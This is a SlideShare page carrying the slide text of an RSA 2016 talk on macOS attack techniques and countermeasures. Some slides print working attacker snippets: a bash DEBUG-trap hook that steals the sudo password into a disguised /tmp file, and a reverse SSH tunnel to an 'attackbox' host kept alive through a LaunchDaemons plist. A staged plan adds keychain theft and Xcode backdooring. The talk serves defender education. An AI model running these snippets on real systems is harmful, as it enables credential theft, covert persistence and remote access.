SlideShare a Scribd company logo

Hacking Exposed: The Mac Attack

Priyanka Aash
Priyanka Aash

Windows attacks receive all the attention. However, Mac and Linux have gained in popularity with the adversary. This session will focus on common Mac attack vectors and other cross-platform hacks that are typically seen in enterprise intrusions. We will also cover practical counter measures to make these alternate platforms more resilient. (Source: RSA USA 2016-San Francisco)

Technology
1 of 26
Download to read offline
SESSION ID: #RSAC Dmitri Alperovitch HACKING EXPOSED: MAC ATTACK EXP-R04 Co-Founder & CTO CrowdStrike Inc. @DAlperovitch George Kurtz Co-Founder, President & CEO CrowdStrike Inc. @George_Kurtz
#RSAC GEORGE KURTZ In security for 20 +years President & CEO, CrowdStrike Former CTO, McAfee Former CEO, Foundstone Co-Author, Hacking Exposed 2 A LITTLE ABOUT US:
#RSAC DMITRI ALPEROVITCH Co-Founder & CTO, CrowdStrike Former VP Threat Research, McAfee Author of Operation Aurora, Night Dragon, Shady RAT reports MIT Tech Review’s Top 35 Innovator Under 35 for 2013 Foreign Policy’s Top 100 Leading Global Thinkers for 2013 3 A LITTLE ABOUT US:
#RSAC The Ninjas Matt Bauer Sr. Software Engineer CrowdStrikeJaron Bradley Sr. Intrusion Analyst CrowdStrike
#RSAC Agenda 5 Mac Attacks OSX Security Features Tradecraft The Setup & Attack Plan Demo Countermeasures
#RSAC Mac market share rising 6 StatCounter 89.9 90.55 88.83 86.8 84.83 7.47 7.66 8.72 9.33 9.14 0 10 20 30 40 50 60 70 80 90 100 2012 2013 2014 2015 2016 Desktop/Laptop Market Share 2012-2016 Windows Mac
#RSAC Mac Attacks 7 Winter 2006: Leap Worm Spreads as an archive sent over iChat to local users Limited harmful impact Fall 2007: RSPlug DNSChanger variant for Mac Distributed as fake video codec on porn sites Changed DNS servers to redirect to phishing and porn sites Fall 2010: Koobface Mac version of infamous Facebook worm
#RSAC Mac Attacks (cont) 8 Fall 2011: Flashback Worm > 700,000 infected users Infection via Drive-By Java exploit Winter 2012: Gh0st RAT OSX Variant (MacControl) KEYHOLE PANDA targeted malware targeting Tibetan and Uyghur activists Delivered via Java and Office exploits Summer 2012: OSX/Crisis (Attribution: Hacking Team) Discovered in targeted intrusions Monitors and records Skype, Adium, web browsing Rootkit capabilities
#RSAC Mac Attacks (cont) 9 Fall 2013: OSX/Leverage Discovered in targeted intrusions related to Syria Written in RealBasic Winter 2016: FakeFlash Signed fake Flash player update Installs scareware (FakeAV style)
#RSAC Apple Security Features
#RSAC OSX Security Features 11 Leopard: 2007 Quarantine Bit: extended file attribute flag indicating the file was downloaded from the Web Partial ASLR App Sandbox (Seatbelt) Snow Leopard: 2009 XProtect: AV-style blacklist updated monthly by Apple Lion: 2011 FileVault: full-disk encryption NX, Full ASLR
#RSAC OSX Security Features (cont) 12 Mountain Lion: 2012 Gatekeeper Kernel ASLR Mavericks: 2013 Support code-signing for kernel extensions El Capitan: 2015 Full requirement to code-sign kernel extensions System Integrity Protection: prevent root user from tampering with key system files and raise the bar for rootkits and prevent code injection App Transport Security (ATS): HTTPS with forward secrecy by default in apps
#RSAC Tradecraft
#RSAC Challenges to solve 14 Initial infiltration: Code Execution How to get around Gatekeeper? Possibilities 1. Exploit browser (eg. Java, Flash, native browser exploit) 2. Exploit productivity app (eg. Office, Preview, Adium) 3. Spearphish user with link/attachment (with Gatekeeper hack)
#RSAC Bypassing Gatekeeper 15 Great research by Patrick Wardle @ Synack (VB2015 paper)
#RSAC Challenges to solve (cont) 16 Privilege Escalation How to become root? Possibilities 1. Privesc exploit 2. Hook sudo in bash getpwd () { if [[ $BASH_COMMAND == sudo* ]]; then printf “Password:” read –s PASS; echo $PASS >/tmp/com.apple.launchd.pshbnY173 echo –e “nSorry, try again.n” fi } trap getpwd DEBUG 3. Ask the user during install
#RSAC Challenges to solve (cont) 17 Persistence and Command & Control How to gain & keep remote access? Possibilities 1. Malware 2. Reverse ssh tunnel ssh –fN –R ${PortFwd}:localhost:22 acc@attackbox a. Save in plist file b. Convert to binary with plutil –convert binary1 ${ASEPplist} c. Save in /System/Library/LaunchDaemons (use SIP exception file)
#RSAC Challenges to solve (cont) 18 Stealth How to keep hidden from easy discovery? Possibilities 1. Malware rootkit hooks 2. Bash hooks in /etc/profile “ps aux” before hook “ps aux” after hook
#RSAC Challenges to solve (cont) 19 Permanent backdoor How do we quietly backdoor many other systems/applications? Ken Thompson: “Reflections on Trusting Trust” (1984) Lesson: Backdooring the compiler is the ultimate win Idea: Let’s hijack XCode compilation process
#RSAC XCode hijacking 20 Yet again - great research by Patrick Wardle (CanSecWest 2015) Dylib hijacking (similar to DLL hijacking on Windows) 1. Place a malicious dylib in the search ppath of XCode application 2. Intercept compilation requests and inject backdoor source code, removing any information from the build log 3. PROFIT!
#RSAC Putting it all together: Setup & Attack Plan
#RSAC Attack Overview 22 1. Send spearphish “Software Update” package to victim 2. Package it up with signed binary vulnerable to Gatekeeper bypass 3. Steal root password via UI prompt and sudo hook (failsafe) 4. Establish persistent SSH reverse tunnel via ASEP plist 5. Hook /etc/profile to hide our SSH tunnel, files and root activities 6. Steal victim keychain through SSH tunnel 7. Use stolen keychain to move laterally to Windows systems and exfiltrate data (smbutil) 8. Implant Xcode malicious Dylib to backdoor compiled applications 9. WIN!
#RSAC Network Setup 23 Windows File Share Victim Mac System Attacker Macbook (for keychain extraction) Attacker C2
#RSAC DEMO
#RSAC Countermeasures 25 Keep close eye on /etc/profile, /etc/.bashrc, ~/.bash_profile, ~/.bashrc, ~/.bash_logout and ~/.inputrc Monitor for suspicious network connections out of your environment Monitor for any suspicious DYLIB writes to key /Applications and /System directories Use next-generation Endpoint Detect & Response (EDR) solutions
#RSAC THANK YOU! 26 HOW TO REACH US: TWITTER: @GEORGE_KURTZ & @DALPEROVITCH LEARN MORE ABOUT NEXT-GENERATION ENDPOINT PROTECTION LEARN ABOUT CROWDSTRIKE FALCON: WWW.CROWDSTRIKE.COM/PRODUCTS REQUEST A DEMO: WWW.CROWDSTRIKE.COM/REQUEST-A-DEMO/ COME MEET US: BOOTH 2045 SOUTH HALL

Recommended

(03 2013) guide to kali linux
(03 2013) guide to kali linux(03 2013) guide to kali linux
(03 2013) guide to kali linux
julius77
 
Introduction to iOS Penetration Testing
Introduction to iOS Penetration TestingIntroduction to iOS Penetration Testing
Introduction to iOS Penetration Testing
OWASP
 
Pa or die
Pa or diePa or die
Pa or die
Setia Juli Irzal Ismail
 
BASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUXBASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUX
Deborah Akuoko
 
kali linux.pptx
kali linux.pptxkali linux.pptx
kali linux.pptx
anumeha bhatnagar
 
The Hookshot: Runtime Exploitation
The Hookshot: Runtime ExploitationThe Hookshot: Runtime Exploitation
The Hookshot: Runtime Exploitation
Prathan Phongthiproek
 
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
RootedCON
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android Bot
Priyanka Aash
 

Recommended

(03 2013) guide to kali linux
(03 2013) guide to kali linux(03 2013) guide to kali linux
(03 2013) guide to kali linux
julius77
 
Introduction to iOS Penetration Testing
Introduction to iOS Penetration TestingIntroduction to iOS Penetration Testing
Introduction to iOS Penetration Testing
OWASP
 
Pa or die
Pa or diePa or die
Pa or die
Setia Juli Irzal Ismail
 
BASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUXBASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUX
Deborah Akuoko
 
kali linux.pptx
kali linux.pptxkali linux.pptx
kali linux.pptx
anumeha bhatnagar
 
The Hookshot: Runtime Exploitation
The Hookshot: Runtime ExploitationThe Hookshot: Runtime Exploitation
The Hookshot: Runtime Exploitation
Prathan Phongthiproek
 
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
RootedCON
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android Bot
Priyanka Aash
 
Kal i linux
Kal i linuxKal i linux
Kal i linux
shamsa222
 
TRITON: The Next Generation of ICS Malware
TRITON: The Next Generation of ICS MalwareTRITON: The Next Generation of ICS Malware
TRITON: The Next Generation of ICS Malware
Thomas Roccia
 
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
grecsl
 
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
RootedCON
 
Syrian Malware
Syrian MalwareSyrian Malware
Syrian Malware
Kaspersky
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
Suwitcha Musijaral CISSP,CISA,GWAPT,SNORTCP
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLV
Thomas Roccia
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secure
Kaspersky
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
Kaspersky
 
[2.2] Hacking Internet of Things devices - Ivan Novikov
[2.2] Hacking Internet of Things devices - Ivan Novikov[2.2] Hacking Internet of Things devices - Ivan Novikov
[2.2] Hacking Internet of Things devices - Ivan Novikov
OWASP Russia
 
Slides null puliya linux basics
Slides null puliya linux basicsSlides null puliya linux basics
Slides null puliya linux basics
Anant Shrivastava
 
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
RootedCON
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
idsecconf
 
Alice and bob: Love & the most important crypto on the net
Alice and bob: Love & the most important crypto on the netAlice and bob: Love & the most important crypto on the net
Alice and bob: Love & the most important crypto on the net
Chris Hammond-Thrasher
 
Stranger Danger: Securing Third Party Components (Tech2020)
Stranger Danger: Securing Third Party Components (Tech2020)Stranger Danger: Securing Third Party Components (Tech2020)
Stranger Danger: Securing Third Party Components (Tech2020)
Guy Podjarny
 
How Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us VulnerableHow Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us Vulnerable
Ray Potter
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
Hacks in Taiwan (HITCON)
 
Secure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSecure Coding for Java - An Introduction
Secure Coding for Java - An Introduction
Sebastien Gioria
 
ION Toronto - IETF Update
ION Toronto - IETF UpdateION Toronto - IETF Update
ION Toronto - IETF Update
Deploy360 Programme (Internet Society)
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
Priyanka Aash
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
Priyanka Aash
 
Hacking exposed : The adversary Oscars
Hacking exposed : The adversary OscarsHacking exposed : The adversary Oscars
Hacking exposed : The adversary Oscars
Priyanka Aash
 

More Related Content

What's hot

Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
grecsl
 
Syrian Malware
Syrian MalwareSyrian Malware
Syrian Malware
Kaspersky
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secure
Kaspersky
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
Kaspersky
 
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
RootedCON
 
How Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us VulnerableHow Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us Vulnerable
Ray Potter
 

What's hot (19)

Kal i linux
Kal i linuxKal i linux
Kal i linux
 
TRITON: The Next Generation of ICS Malware
TRITON: The Next Generation of ICS MalwareTRITON: The Next Generation of ICS Malware
TRITON: The Next Generation of ICS Malware
 
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
 
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
 
Syrian Malware
Syrian MalwareSyrian Malware
Syrian Malware
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLV
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secure
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
 
[2.2] Hacking Internet of Things devices - Ivan Novikov
[2.2] Hacking Internet of Things devices - Ivan Novikov[2.2] Hacking Internet of Things devices - Ivan Novikov
[2.2] Hacking Internet of Things devices - Ivan Novikov
 
Slides null puliya linux basics
Slides null puliya linux basicsSlides null puliya linux basics
Slides null puliya linux basics
 
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
 
Alice and bob: Love & the most important crypto on the net
Alice and bob: Love & the most important crypto on the netAlice and bob: Love & the most important crypto on the net
Alice and bob: Love & the most important crypto on the net
 
Stranger Danger: Securing Third Party Components (Tech2020)
Stranger Danger: Securing Third Party Components (Tech2020)Stranger Danger: Securing Third Party Components (Tech2020)
Stranger Danger: Securing Third Party Components (Tech2020)
 
How Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us VulnerableHow Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us Vulnerable
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
 
Secure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSecure Coding for Java - An Introduction
Secure Coding for Java - An Introduction
 
ION Toronto - IETF Update
ION Toronto - IETF UpdateION Toronto - IETF Update
ION Toronto - IETF Update
 

Similar to Hacking Exposed: The Mac Attack

Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
Haydn Johnson
 
The Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CDThe Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CD
James Wickett
 
The Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersThe Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software Updaters
Priyanka Aash
 

Similar to Hacking Exposed: The Mac Attack (20)

The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
 
Hacking exposed : The adversary Oscars
Hacking exposed : The adversary OscarsHacking exposed : The adversary Oscars
Hacking exposed : The adversary Oscars
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry more
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
OSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwareOSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adware
 
Hacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsHacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the Shadows
 
How to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laosHow to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laos
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
 
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
 
The Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CDThe Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CD
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-mac
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
 
Attacks on Critical Infrastructure: Insights from the “Big Board”
Attacks on Critical Infrastructure: Insights from the “Big Board”Attacks on Critical Infrastructure: Insights from the “Big Board”
Attacks on Critical Infrastructure: Insights from the “Big Board”
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
 
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
 
The Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersThe Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software Updaters
 
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdfVulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
 
Tsunami of Technologies. Are we prepared?
Tsunami of Technologies. Are we prepared?Tsunami of Technologies. Are we prepared?
Tsunami of Technologies. Are we prepared?
 

More from Priyanka Aash

Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
Priyanka Aash
 

More from Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Recently uploaded

Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 

Recently uploaded (20)

Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
